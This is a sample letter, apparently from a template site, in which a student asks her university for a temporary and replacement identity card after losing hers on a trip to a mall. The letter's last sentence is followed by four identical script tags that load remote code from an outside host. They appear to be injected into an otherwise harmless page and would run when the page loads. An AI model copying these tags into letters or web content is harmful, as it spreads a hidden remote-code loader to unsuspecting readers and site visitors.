Dear Sir/Madam,
I, Sharmistha Naskar, am an existing student of Dune University in Computer Application department. I am writing this letter to inform you regarding an unfortunate loss of my student identification card.
Day before yesterday, I was traveling from university to a shopping mall with friends since there was some special offer going on for Dune University on some snacks and activities. We planned to avail that to enjoy the weekend together. Post that while entering to the university, I noticed that I lost my card. Hence, I had to manually complete the entry form at security point and hostel entrance to get in.
Since from Monday we have two crucial classes to attend where we must use the card to access those rooms i.e. library and practical rooms. Apart from this, end of the week we have seminar as well where I will be presenting a documentary of my recent research paper.
I accept that I should have taken care of the card. Please accept my apologies and I can assure you that I shall keep this in mind in future. However, I am requesting you to allow me a temporary card as of now and requesting to issue a new card as well. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
